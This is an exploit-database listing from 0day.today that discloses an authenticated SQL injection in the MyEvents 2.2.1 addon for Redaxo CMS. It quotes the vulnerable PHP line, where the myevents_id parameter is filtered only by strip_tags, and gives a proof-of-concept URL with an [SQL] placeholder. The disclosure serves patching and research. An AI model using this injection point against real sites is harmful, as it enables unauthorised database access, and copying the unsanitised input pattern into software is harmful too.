[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection Vulnerability

Author
h0n1gsp3cht
Risk
[
Security Risk High
]
0day-ID
0day-ID-29965
Category
web applications
Date add
07-03-2018
Platform
php
# Exploit Title: Redaxo CMS Addon MyEvents SQL Injection [ Backend ]
# Exploit Author: h0n1gsp3cht
# Vendor Homepage: http://www.github.com/wende60/myevents
# Version: 2.2.1 (Last Version)
# Tested on: LinuxMint
# More: Login Required
# GET
 
##############
Vuln Code [+] redaxo/src/addons/myevents/pages/event_add.php
##############
 
$myevents_id            =  strip_tags(rex_request('myevents_id', 'string'));
 
###############
POC
###############
 
http://127.0.0.1/redaxo/index.php?page=myevents/event_add&myevents_id=[SQL]

#  0day.today [2024-11-17]  #